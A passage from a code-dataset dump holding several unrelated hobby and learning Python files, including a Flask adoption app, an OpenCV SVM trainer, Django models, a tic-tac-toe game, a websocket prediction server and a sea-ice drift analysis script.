maxsplit=1)]\n else:\n arg_split = [x.strip() for x in args.split(\"=\", maxsplit=1)]\n\n arg_split = [x for x in arg_split if x != \"\"]\n\n if len(arg_split) != 2:\n return CommandFailure(\"Failed to store variable: Invalid syntax.\")\n\n scope = self.vars\n\n var_name = arg_split[0]\n while len(var_name) > 0 and var_name[0] == \"|\" and scope.parent is not None:\n var_name = var_name[1:].lstrip()\n scope = scope.parent\n\n if echo:\n scope[var_name] = arg_split[1]\n return\n\n result = await self._evaluate(message, arg_split[1], \"var\")\n\n if isinstance(result, CommandFailure):\n return CommandFailure(f'Expression after \"=\" failed:\\n{result}')\n\n if result is None:\n return 
CommandFailure(f'Expression after \"=\" returned no value.')\n\n        scope[var_name] = result\n\n        if isinstance(result, Scope):\n            result.recontextualize(var_name, scope)\n\n        if isinstance(result, ChatInstance):\n            result.name = var_name\n","repo_name":"deepfates/fictionsuit","sub_path":"fictionsuit/commands/scripting.py","file_name":"scripting.py","file_ext":"py","file_size_in_byte":32291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74347742884","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 17:44:01 2018\n#SVM FOR easyPR\n#very simple SVM module\n#just uses all pixel values of each img\n@author: zhouwei\n\"\"\"\nimport numpy as np\nimport cv2 as cv\nimport os \n\n#load data \ndef LoadData(fileDir,typex):\n    if not os.path.exists(fileDir):  # check the directory exists before listing it\n        print(\"no such file\")\n        return\n    listfile = os.listdir(fileDir)\n    traindata = []\n    labeldata= []\n    for i in range(len(listfile)):\n        path = os.path.join(str(fileDir),str(listfile[i]))\n        imgtmp = cv.imread(path,0)\n        imgtmp = imgtmp.flatten()#mat 2 (1,n)\n        imgtmp = np.array(list(imgtmp),dtype = np.float32)#svm data format\n        traindata.append(imgtmp)\n        labeldata.append(np.int32(typex))\n\n    return traindata,labeldata\nprint(\"zhouwei first SVM module test:)\")\nprint(\"load train data set\")\n#pos data\nfileDir = \"../resources/train/has/train\"\ntrainlist,trainlabel = LoadData(fileDir,1)\n#neg data \nfileDir =\"../resources/train/no/train\"\ntrainlist01,trainlabel01 = LoadData(fileDir,0)\n\n#train data set proc --format for SVM \ntrainlist = np.vstack((trainlist,trainlist01))#train data set\ntrainlabel.extend(trainlabel01)#train label set\n\nprint(\"load test data set\")\n#pos data\nfileDir = \"../resources/train/has/test/\"\ntestlist,testlabel = LoadData(fileDir,1)\n#neg data \nfileDir =\"../resources/train/no/test/\"\ntestlist01,testlabel01 = LoadData(fileDir,0)\n#test set format for SVM\ntestlist = np.vstack((testlist,testlist01))\ntestlabel.extend(testlabel01)\n\n#create SVM module\nsvm = cv.ml.SVM_create()\n#SVM CONFIG\ncriteria = (cv.TERM_CRITERIA_MAX_ITER + cv.TERM_CRITERIA_EPS,1000,1E-2)\nsvm.setTermCriteria(criteria)\nsvm.setGamma(1)\nsvm.setKernel(cv.ml.SVM_LINEAR)\nsvm.setP(0.0)\nsvm.setC(1)\n\nprint(\"train SVM module\")\nsvm.train(np.array(trainlist),cv.ml.ROW_SAMPLE,np.array(trainlabel))\nprint(\"save module\")\nsvm.save(\"mySvmMoudle01.mat\")\n\nprint(\"testing ...\")\nm = np.array(testlist).shape[0]# test set size \nn = 0\nfor i in range(m):\n    testmat = np.mat(testlist[i])# predict format is 1xN, so build a mat\n    p = svm.predict(testmat)#p \n    #print(p)#debug for p contents\n    if p[1][0][0] == testlabel[i]:\n        n += 1\naccuracy = n/np.float32(m)\n\nprint(\"accuracy is :%f\"%(accuracy))\n\n\n \n \n\n\n\n","repo_name":"CSUaltitude/EasyPRLearning","sub_path":"EasyPRLearning/SVM_PR02.py","file_name":"SVM_PR02.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72064326564","text":"from django.db import models\n\n# Create your models here.\n\nclass Genre(models.Model):\n    \"\"\"\n    Model representing a book genre (e.g. Science Fiction, Non Fiction).\n    \"\"\"\n    name = models.CharField(max_length=200, help_text=\"Enter a book genre (e.g. 
Science Fiction, French Poetry etc.)\")\n\n def __str__(self):\n \"\"\"\n String for representing the Model object (in Admin site etc.)\n \"\"\"\n return self.name\n\nfrom django.urls import reverse #Used to generate URLs by reversing the URL patterns\n\nclass Book(models.Model):\n \"\"\"\n Model representing a book (but not a specific copy of a book).\n \"\"\"\n title = models.CharField(max_length=200)\n author = models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)\n # Foreign Key used because book can only have one author, but authors can have multiple books\n # Author as a string rather than object because it hasn't been declared yet in the file.\n summary = models.TextField(max_length=1000, help_text=\"Enter a brief description of the book\")\n isbn = models.CharField('ISBN',max_length=13, help_text='13 Character ISBN number')\n genre = models.ManyToManyField(Genre, help_text=\"Select a genre for this book\")\n # ManyToManyField used because genre can contain many books. Books can cover many genres.\n # Genre class has already been defined so we can specify the object above.\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n return self.title\n\n\n def get_absolute_url(self):\n \"\"\"\n Returns the url to access a particular book instance.\n \"\"\"\n return reverse('book-detail', args=[str(self.id)])\n","repo_name":"Zverina1337/library","sub_path":"python/django/django_test/localLibrary/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8636251577","text":"# THE BASIC SYNTAX:\n# try:\n# except:\n\n# try:\n# foobar\n# except:\n# print(\"PROBLEM!\")\n# print(\"after the try\")\n\n\ndef get(d, key):\n try:\n return d[key]\n except KeyError:\n return None\n\n\nd = {\"name\": \"Ricky\"}\nprint(get(d, \"city\"))\nd[\"city\"]\n\n\n# try:\n# except:\n# else:\n# finally:\n","repo_name":"syurskyi/Python_Topics","sub_path":"070_oop/007_exceptions/examples/The_Modern_Python_3_Bootcamp/210. Try and Except Blocks.py","file_name":"210. 
Try and Except Blocks.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14925240244","text":"\"\"\"Flask app for Adoption Agency\"\"\"\n\nfrom flask import Flask, url_for, render_template, redirect\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, connect_db, Pet\nfrom forms import AddPetForm, EditPetForm\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"moomooimacow\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///adoption'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\napp.app_context().push()\nconnect_db(app)\ndb.create_all()\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    \"\"\"Show 404 NOT FOUND page.\"\"\"\n    return render_template('404.html'), 404\n\n# 127.0.0.1:5000/\n@app.route('/')\ndef homepage():\n    \"\"\"Homepage\"\"\"\n    pet = Pet.query.all()\n    return render_template('homepage.html', pet=pet)\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add_pet():\n    \"\"\"Add a pet\"\"\"\n    form = AddPetForm()\n\n    if form.validate_on_submit():\n        name = form.name.data\n        species = form.species.data\n        photo_url = form.photo_url.data\n        age = form.age.data\n        notes = form.notes.data\n        pet = Pet(name=name, species=species, photo_url=photo_url, age=age, notes=notes)\n        db.session.add(pet)\n        db.session.commit()\n        return redirect('/')\n    else:\n        return render_template('add_pet.html', form=form)\n\n\n@app.route(\"/<int:pet_id>\", methods=[\"GET\", \"POST\"])\ndef edit_pet(pet_id):\n    \"\"\"Edit pet\"\"\"\n    pet = Pet.query.get_or_404(pet_id)\n    form = EditPetForm(obj=pet)\n\n    if form.validate_on_submit():\n        pet.notes = form.notes.data\n        pet.available = form.available.data\n        pet.photo_url = form.photo_url.data\n        db.session.commit()\n        return redirect('/')\n    else:\n        return render_template(\"edit_pet.html\", form=form, pet=pet)","repo_name":"eleonora1218/Adopt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37602182428","text":"'''\nWrite a program which takes as input a very long sequence of numbers and prints the numbers\nin sorted order. Each number is at most k away from its correctly sorted position. (Such an array\nis sometimes referred to as being k-sorted). For example, no number in the sequence (3,-1,2,6,4,5,8)\nis more than 2 away from its final sorted position.\n'''\n\nimport heapq,itertools\ndef sort_k(sequence,k):\n    '''\n    sequence = 3,-1,2,6,4,5,8\n    k = 2\n    '''\n    ans = []\n    heapq.heapify(sequence) # heapify works in place and returns None\n    while sequence:\n        ans.append(heapq.heappop(sequence))\n    return ans\n\n'''\nBrute force solution is O(nLogn) time and O(n) space complexity.\n'''\n\ndef sort_approximately_sorted_array(sequence,k):\n    # sequence must be an iterator: islice consumes the first k elements\n    result = []\n    min_heap = []\n    for x in itertools.islice(sequence,k):\n        heapq.heappush(min_heap,x)\n    for x in sequence:\n        smallest = heapq.heappushpop(min_heap,x)\n        result.append(smallest)\n    while min_heap:\n        smallest = heapq.heappop(min_heap)\n        result.append(smallest)\n    return result\n\n'''\nThe time complexity is O(nLogk). 
The space complexity is O(k)\n'''\n","repo_name":"RicardoTlatelpa/Algorithms-DataStructures","sub_path":"epi/heaps/almostSorted.py","file_name":"almostSorted.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40872509668","text":"\r\nimport random\r\n\r\nfrom IPython.display import clear_output\r\n\r\ndef display_board(board):\r\n print('{} | {} | {}'.format( board[1],board[2],board[3]))\r\n print('{} | {} | {}'.format( board[4],board[5],board[6]))\r\n print('{} | {} | {}'.format( board[7],board[8],board[9]))\r\n\r\ndef place_marker(board, marker, position):\r\n board[position]=marker.upper()\r\n clear_output()\r\n display_board(board)\r\n \r\ndef player_input():\r\n while True:\r\n xoro=input('X or O')\r\n if xoro.upper() in ('X','O'):\r\n if xoro.upper()=='X':\r\n return('X','O')\r\n else:\r\n return('O','X')\r\n\r\ndef space_check(board, position):\r\n try:\r\n position=int(position)\r\n if position not in full:\r\n return space_check(board, (input('Please choose a number between 1 and 9 ')))\r\n elif position in Positions:\r\n return space_check(board, int(input('this place was already taken, choose another! ')))\r\n else:\r\n return position\r\n except:\r\n return space_check(board, (input('this is not an integer! ')))\r\n \r\ndef full_board_check(positions):\r\n return (full == sorted(positions))\r\n \r\n\r\ndef choose_first(a,b):\r\n return (random.choice([a,b]))\r\n \r\n\r\ndef play(player):\r\n position=space_check(board, (input('{} choose a position'.format(player))))\r\n \r\n place_marker(board, player, position)\r\n Positions.append(position)\r\n\r\ndef win_check(board, mark):\r\n x=( board[1]==board[2]==board[3]==mark or\r\n board[4]==board[5]==board[6]==mark or \r\n board[7]==board[8]==board[9]==mark or\r\n board[1]==board[5]==board[9]==mark or\r\n board[3]==board[5]==board[7]==mark or\r\n board[1]==board[4]==board[7]==mark or\r\n board[2]==board[5]==board[8]==mark or\r\n board[3]==board[6]==board[9]==mark)\r\n return x\r\n\r\ndef replay():\r\n while True:\r\n x=input('DO YOU WANT TO PLAY AGAIN?')\r\n if x.lower()=='yes':\r\n clear_output()\r\n return True\r\n elif x.lower()=='no':\r\n clear_output()\r\n return False\r\n else: print('reply by yes or no')\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nwhile True:\r\n board=[' ']*10\r\n Positions=[]\r\n full=[1,2,3,4,5,6,7,8,9]\r\n print('Player1 ')\r\n Player1,Player2=player_input()\r\n print('Player1: {} \\nPlayer2:{} '.format(Player1,Player2))\r\n \r\n first=choose_first('Player1','Player2')\r\n print('{} will go first'.format(first))\r\n while True:\r\n if first=='Player1':\r\n play(Player1)\r\n\r\n if win_check(board,Player1.upper()):\r\n print('Player1 WON')\r\n break\r\n \r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player2)\r\n if win_check(board,Player2.upper()):\r\n print('Player2 WON')\r\n break\r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player2)\r\n if win_check(board,Player2.upper()):\r\n print('Player2 WON')\r\n break\r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player1)\r\n if win_check(board,Player1.upper()):\r\n print('Player1 WON')\r\n break \r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n \r\n \r\n\r\n \r\n \r\n \r\n if not replay():\r\n print('Bye!')\r\n 
break\r\n","repo_name":"nshafik/Python-Games","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8677828220","text":"import numpy as np\nimport spiceypy as sp\nimport DateTimeTools as TT\nimport os\nfrom . import Globals\n\nlsk_path = Globals.SpicePath + '/lsk/naif0010.tls'\n\ndef utc2et(Date,ut):\n\t'''\n\tConvert Date and ut to the ephemeris time used for SPICE.\n\t\n\tInputs\n\t======\n\tDate : int\n\t\tDate(s) in format yyyymmdd\n\tut : float\n\t\tTime(s) in hours from beginning of the day\n\t\t\n\tReturns\n\t=======\n\tet : ephemeris times\n\t\n\t'''\n\t\n\t#split up the dates and times\n\tn = np.size(ut)\n\tif np.size(Date) == 1:\n\t\tDate = np.zeros(n,dtype='int32') + Date\n\tif np.size(ut) == 1:\n\t\tut = np.zeros(n,dtype='float32') + ut\n\tyr = Date//10000\n\tmn = (Date % 10000)//100\n\tdy = Date % 100\n\thh,mm,ss,ms = TT.DectoHHMM(ut)\n\tss = np.float32(ss) + np.float32(ms)/1000\n\t\n\t#create an array of strings\n\tstrfmt = '{:04d} {:02d} {:02d} {:02d} {:02d} {:06.3f}'\n\tutc_str = np.array([strfmt.format(int(yr[i]),int(mn[i]),int(dy[i]),int(hh[i]),int(mm[i]),float(ss[i])) for i in range(0,n)])\n\n\t#check that lsk is loaded\n\tcnt=sp.ktotal('ALL')\n\tloaded = False\n\tif cnt != 0:\n\t\tfor i in range(0,cnt):\n\t\t\tk_name,k_type,k_src,k_handle = sp.kdata(i,'ALL',128,32,128)\n\t\t\tif k_name == lsk_path:\n\t\t\t\tloaded = True\n\t\t\t\tbreak\n\t\n\tif loaded == False:\n\t\tsp.furnsh(lsk_path)\n\t\n\t#create the output array\n\tet = np.zeros((n,),dtype='float64')\n\tfor i in range(0,n):\n\t\tet[i] = sp.str2et(utc_str[i])\n\t\n\tif loaded == False:\n\t\tsp.unload(lsk_path)\n\n\tif n == 1:\n\t\treturn et[0]\n\telse:\n\t\treturn et\n","repo_name":"mattkjames7/PlanetSpice","sub_path":"PlanetSpice/utc2et.py","file_name":"utc2et.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15293049411","text":"#!/usr/bin/env python\n\nfrom flask import Flask, request, redirect, url_for\nfrom flask_restful import Resource, Api\nfrom joblib import load\nimport numpy as np\nimport pandas as pd\nimport sklearn\nimport json\nimport asyncio\nimport websockets\nimport logging\n\nimport time\n\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\nUSERS = set()\n\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\n\ndef users_event():\n return json.dumps({\"type\": \"users\", \"count\": len(USERS)})\n\n\nasync def notify_new_data(data):\n if USERS: # asyncio.wait doesn't accept an empty list\n json_data = json.dumps(data)\n await asyncio.wait([user.send(json_data) for user in USERS])\n\n\nasync def notify_users():\n if USERS: # asyncio.wait doesn't accept an empty list\n message = users_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def register(websocket):\n USERS.add(websocket)\n await notify_users()\n\n\nasync def unregister(websocket):\n USERS.remove(websocket)\n await notify_users()\n\n#\n# async def counter(websocket, path):\n# # register(websocket) sends user_event() to websocket\n# await register(websocket)\n# try:\n# await websocket.send(state_event())\n# async for message in websocket:\n# data = json.loads(message)\n# if data[\"action\"] == \"minus\":\n# STATE[\"value\"] -= 1\n# await notify_state()\n# elif data[\"action\"] == \"plus\":\n# STATE[\"value\"] += 1\n# await 
notify_state()\n# else:\n# logging.error(\"unsupported event: {}\", data)\n# finally:\n# await unregister(websocket)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom flask_cors import CORS, cross_origin\n\n# Upload folder\nUPLOAD_FOLDER = 'img'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\n\n#\n# app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# app.config['CORS_HEADERS'] = 'Content-Type'\n# CORS(app)\n#\n# api = Api(app)\n\nlatest_pred = 0\nlatest_actual = 0\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef get_prediction(feature_row):\n json_row = json.loads(feature_row)\n features_array = json_row['feature_row'][:10]\n actual_movement = json_row['feature_row'][-1]\n np_arr = np.array(features_array).reshape(1,-1)\n prediction = model.predict(np_arr)[0]\n print(prediction)\n print(\"Ran prediction\")\n return {\"pred\": prediction, \"actual\": actual_movement}\n\n\nglobal global_latest_pred\nglobal global_latest_actual\nglobal global_history\nglobal model\n\nmodel = load(\"trained_classifier.joblib\")\n\n\n\nglobal_latest_pred = 0\nglobal_latest_actual = 0\nglobal_history = []\n\n\nclass MovementPrediction(Resource):\n\n def post(self):\n feature_row = request.get_json()\n print(feature_row)\n pred_obj = get_prediction(feature_row)\n global_latest_pred = pred_obj['pred']\n global_latest_actual = pred_obj['actual']\n global_history.append({'pred': global_latest_pred, 'actual': global_latest_actual})\n print(\"Added point\")\n print(len(global_history))\n return {'success': \"True\"}\n\n def get(self):\n ind_json = request.args.get('index')\n print(ind_json)\n ind_num = int(ind_json)\n print(ind_num)\n if len(global_history) < ind_num + 1:\n return {\"success\": \"False\"}\n else:\n return global_history[ind_num]\n\n\n# api.add_resource(MovementPrediction, '/predict/')\n\n\n# WS server example\n\nasync def hello(websocket, path):\n name = await websocket.recv()\n print(f\"< {name}\")\n\n greeting = f\"Hello {name}!\"\n\n await websocket.send(greeting)\n print(f\"> {greeting}\")\n\n\nasync def save_the_data(message):\n # feature_row = await websocket.recv()\n feature_row = message\n print(feature_row)\n pred_obj = get_prediction(feature_row)\n global_latest_pred = pred_obj['pred']\n global_latest_actual = pred_obj['actual']\n global_history.append({'pred': global_latest_pred, 'actual': global_latest_actual})\n print(\"Added point\")\n print(len(global_history))\n # print(\"Got\")\n # print(f\"< {name}\")\n # await websocket.send(\"Got it\")\n # print(f\"> {greeting}\")\n\n\nasync def save_data(websocket, path):\n try:\n delay = 0\n await register(websocket)\n async for message in websocket:\n if message == \"slow\":\n delay = .5\n else:\n await save_the_data(message)\n time.sleep(delay)\n await notify_new_data(global_history[-1])\n finally:\n await unregister(websocket)\n\n\n\n\n\nprint(\"Im alive\")\n\nstart_server = websockets.serve(save_data, \"localhost\", 8765, ping_timeout=None)\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n\n\n# if __name__ == '__main__':\n # app.run(debug=True, host='0.0.0.0')\n\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\nUSERS = set()\n\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\n\ndef users_event():\n return json.dumps({\"type\": \"users\", \"count\": len(USERS)})\n\n\nasync def notify_state():\n if USERS: # asyncio.wait doesn't accept an empty list\n 
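# fan the updated counter state out to every registered client\n        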
message = state_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def notify_users():\n if USERS: # asyncio.wait doesn't accept an empty list\n message = users_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def register(websocket):\n USERS.add(websocket)\n await notify_users()\n\n\nasync def unregister(websocket):\n USERS.remove(websocket)\n await notify_users()\n\n\nasync def counter(websocket, path):\n # register(websocket) sends user_event() to websocket\n await register(websocket)\n try:\n await websocket.send(state_event())\n async for message in websocket:\n data = json.loads(message)\n if data[\"action\"] == \"minus\":\n STATE[\"value\"] -= 1\n await notify_state()\n elif data[\"action\"] == \"plus\":\n STATE[\"value\"] += 1\n await notify_state()\n else:\n logging.error(\"unsupported event: {}\", data)\n finally:\n await unregister(websocket)\n\n\nstart_server = websockets.serve(counter, \"localhost\", 6789)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ronykrell/garlichackathon","sub_path":"garlic_spread.py","file_name":"garlic_spread.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34021870524","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import serializers\nfrom locator.models import Locator\nfrom locator.service import Locator as Locator_Service\nfrom ast import literal_eval as make_tuple\n\nimport logging\n\nlogger = logging.getLogger('django')\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ['url', 'username', 'email', 'groups']\n\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ['url', 'name']\n\n\nclass LocatorSerializer(serializers.Serializer):\n points = serializers.CharField(required=True, allow_blank=False)\n adjuscent = serializers.CharField(required=False, read_only=True)\n\n class Meta:\n model = Locator\n fields = ['id', 'points']\n\n # id = serializers.IntegerField(read_only=True)\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new locator instance.\n \"\"\"\n\n validated_data['points'] = validated_data['points'].replace(\" \", \"\")\n delimeter = \"),\"\n # strip req string\n params = [\n e+')' for e in validated_data['points'].strip().split(delimeter) if e]\n params[len(params)-1] = params[len(params)-1].replace(\"))\", \")\")\n\n params_tuple = list(set([make_tuple(e) for e in params if e]))\n\n # points = validated_data['points'].split(\")\")\n\n loc_service = Locator_Service(params_tuple)\n\n validated_data['adjuscent'] = \"%s,%s\" % (str(loc_service.get_adjuscent_points()[\n 0]), str(loc_service.get_adjuscent_points()[1]))\n logger.info(\"validated_data\")\n logger.info(str(validated_data['adjuscent'][0]))\n returned_data = Locator.objects.create(**validated_data)\n return returned_data\n","repo_name":"Ndiithi/mfs_locator","sub_path":"mfs_locator/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40832159668","text":"import numpy as np\nfrom glob import glob\nfrom datetime import datetime, timedelta\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport 
pyresample\nimport pyproj\n\nfrom age_func import *\n\n#evaluate neXtSIM drift based on the output in the drifters. Compare to OSI-SAF\n\n#compare April daily means\n\n#inpath='/input_obs_data/polona/FRASIL/age_datamor_long/'\n#inpath='/input_obs_data/einar/datarmor/age_95_noice/'\ninpath='data/drifters/'\noutpath = 'data/outputs/'\noutpath_plots = 'plots/new/'\n\nicosi_path = '/input_obs_data/data/OSISAF_ice_conc/polstere/'\ndrosi_path = '/input_obs_data/data/OSISAF_ice_drift/' #product_version = \"1.3\"\ndrosi_path = '/input_obs_data/polona/old_OSISAF_ice_drift/' #product_version = \"1.3\"\n\n#get OSI-SAF grid\nfn = drosi_path+'2007/01/ice-drift_ice_drift_nh_polstere-625_multi-oi_200701011200-200701031200.nc'\nfn = drosi_path+'ice-drift_ice_drift_nh_polstere-625_multi-oi_200701011200-200701031200.nc'\nf = Dataset(fn)\nlat_osi = f.variables['lat'][:]\nlon_osi = f.variables['lon'][:]\nxc = f.variables['xc'][:]*1000 #change from km to m\nyc = f.variables['yc'][:]*1000\nsf = f.variables['status_flag'][:]\n\n#lists for PDFs\nsl_all = []\nslo_all = []\n\n#for every year (200-) collect all winter data (November-April)\nyears = range(2007,2016)\nfor yr in years:\n print(yr)\n d = 0 #reset day-counter\n \n #make empty arrays\n wdays = 30+31+31+28+31+30 #number of winter days\n if yr%4 ==0 : wdays = wdays+1; print('leap year') #leap year\n ws = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wa = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wso = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wao = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n \n wex = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wey = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wic = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n \n #get all model files\n fl = sorted(\n glob(inpath+'OSISAF_'+str(yr-1)+'11*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr-1)+'12*.nc')+ \\\n \n glob(inpath+'OSISAF_'+str(yr)+'01*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'02*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'03*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'04*.nc') )\n #print(fl)\n \n for fn in fl:\n print(fn)\n f = Dataset(fn)\n time = f.variables['time'][:]\n base = datetime(1900,1,1)\n dt = base + timedelta(days=int(time[0]))\n \n year = str(dt.year)\n mon = dt.strftime(\"%m\")\n day = dt.strftime(\"%d\")\n \n lats0 = f.variables['latitude'][0,:,0]\n lons0 = f.variables['longitude'][0,:,0]\n lats1 = f.variables['latitude'][1,:,0]\n lons1 = f.variables['longitude'][1,:,0]\n #index = f.variables['index'][0,:,0]\n sic = f.variables['sic'][0,:,0]\n \n #project lat,lon coordinates and calculate displacements\n #use OSI-SAF projection: proj4_string = \"+proj=stere +a=6378273 +b=6356889.44891 +lat_0=90 +lat_ts=70 +lon_0=-45\"\n wgs84=pyproj.Proj(\"+init=EPSG:4326\") \n nh_stere=pyproj.Proj(\"+proj=stere +a=6378273 +b=6356889.44891 +lat_0=90 +lat_ts=70 +lon_0=-45\")\n x0,y0 = pyproj.transform(wgs84, nh_stere,lons0,lats0)\n x1,y1 = pyproj.transform(wgs84, nh_stere,lons1,lats1)\n dx = x1-x0\n dy = y1-y0\n \n #put displacements on a regular grid (pyresample) - they should be very close in space and no information lost by interpolation\n swath_def = pyresample.geometry.SwathDefinition(lons=lons0, lats=lats0)\n targ_def = pyresample.geometry.SwathDefinition(lons=lon_osi, lats=lat_osi)\n \n dx_g = pyresample.kd_tree.resample_nearest(swath_def, dx, targ_def, radius_of_influence=65000, fill_value=None) #undefined pixles are masked\n dy_g = 
pyresample.kd_tree.resample_nearest(swath_def, dy, targ_def, radius_of_influence=65000, fill_value=None)\n sic_g = pyresample.kd_tree.resample_nearest(swath_def, sic, targ_def, radius_of_influence=62500)\n\n #get velocities\n tm = (time[0]-time[1])*24*60*60 #this is exactly 2 days anyway\n u = dx_g/tm\n v = dy_g/tm\n \n #when compared to OSI-SAF dX,dY, we notice a difference in grid orientation, therefore we invert the sign here (see bellow):\n dy_g = -dy_g\n v = -v\n \n ##quiver plot\n #outname = outpath_plots+'drifters_test_arrows.png'\n #plot_quiver(xc,yc,u,v,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n #exit()\n\n #make corresponding OSI-SAF maps\n ##OSI-SAF data\n #try: netcdf_name = glob(drosi_path+year+'/'+mon+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n #except:\n ##the last days of the month are already in the next month folder\n #mon1 = (dt + timedelta(weeks=4)).strftime(\"%m\")\n #year1 = year\n #if int(mon)==12: year1=str(int(year)+1); mon1='01'\n #try: netcdf_name = glob(drosi_path+year1+'/'+mon1+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n #except:\n ##some files are simply missing, those should days should not be analysed\n #d = d+1\n #continue\n \n #with the older OSI-SAF data repository all files are in the same folder and this is more simple\n try: netcdf_name = glob(drosi_path+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n except:\n #some files are simply missing, those should days should not be analysed\n d = d+1\n continue\n \n \n print(netcdf_name)\n \n f = Dataset(netcdf_name) \n dX = f.variables['dX'][0,:,:]*1000\n dY = f.variables['dY'][0,:,:]*1000\n \n ##re-calculate from coordinates and compare\n #lat1_osi = f.variables['lat1'][0,:,:]\n #lon1_osi = f.variables['lon1'][0,:,:]\n #x0,y0 = pyproj.transform(wgs84, nh_stere,lon_osi,lat_osi)\n #x1,y1 = pyproj.transform(wgs84, nh_stere,lon1_osi,lat1_osi)\n #dx = x1-x0\n #dy = y1-y0 \n \n #print(dX[85,55])\n #print(dY[85,55])\n \n #print(dx[85,55])\n #print(dy[85,55])\n \n #the coordintes are same in magnitude, but the dY has swapped sign. To compensate for this we turn around v in nextsim (see above)\n \n uo = dX/tm\n vo = dY/tm\n \n ##quiver plot\n #outname = outpath_plots+'drifters_test_arrows_osi.png'\n #plot_quiver(xc,yc,uo,vo,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n #exit()\n \n #collect all velocites for the month/winter and correlate with OSI-SAF\n #first combine the mask for both datasets\n cmsk = (u.mask) + (uo.mask)\n u = np.ma.array(u.data,mask=cmsk)\n uo = np.ma.array(uo.data,mask=cmsk)\n \n ##quiver plot\n #outname = outpath_plots+'nextsim_drifters_cmsk.png'\n #plot_quiver(xc,yc,u,v,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n ##exit()\n \n #make speed,dir 